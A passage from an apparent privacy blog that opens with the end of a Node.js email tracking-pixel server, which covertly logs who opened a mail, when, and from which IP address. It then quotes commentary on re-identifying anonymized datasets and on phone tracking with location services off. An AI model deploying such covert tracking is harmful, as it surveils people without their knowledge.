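    console.log(`${opens.get(token)} opened the mail at ${new Date().toISOString()} from ${req.socket.remoteAddress}`);
  }
  res.writeHead(200, { "Content-Type": "image/gif" });
  res.end(); // a real tracker would return an actual transparent 1x1 GIF here
}).listen(8080);
```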
" Even the most stringent privacy rules have massive loopholes: they all allow for free distribution of "de-identified" or "anonymized" data that is deemed to be harmless because it has been subjected to some process.
But the reality of "re-identification" attacks tells a different story: ... datasets are released on the promise that they have been de-identified, only to be rapidly (and often trivially) re-identified, putting privacy, financial security, lives and even geopolitical stability at risk." writes Cory Doctorow at Boing Boing, pointing to A Precautionary Approach to Big Data Privacy by Arvind Narayanan, Joanna Huey and Edward Felten:
"even staunch proponents of current de-identification methods admit that they are inadequate for high-dimensional data. These high-dimensional datasets, which contain many data points for each individual’s record, have become the norm: social network data has at least a hundred dimensions and genetic data can have millions. We expect that datasets will continue this trend towards higher dimensionality as the costs of data storage decrease and the ability to track a large number of observations about a single individual increase."
"Religiously turning off location services might not save you from having your phone tracked: a paper from a group of IEEE researchers demonstrates tracking when GPS and Wi-Fi are turned off.
And, as a kicker: at least some of the data used in the attack, published this week on arXiv, can be collected without permission, because smartphone makers don't consider it sensitive." writes Richard Chirgwin at The Register.
Security through obscurity does work in some cases. Even after a deep learning system read 130K privacy policy statements, it was only able to:
ReplyDelete"produce a correct answer among its top-3 results for 82% of the test questions"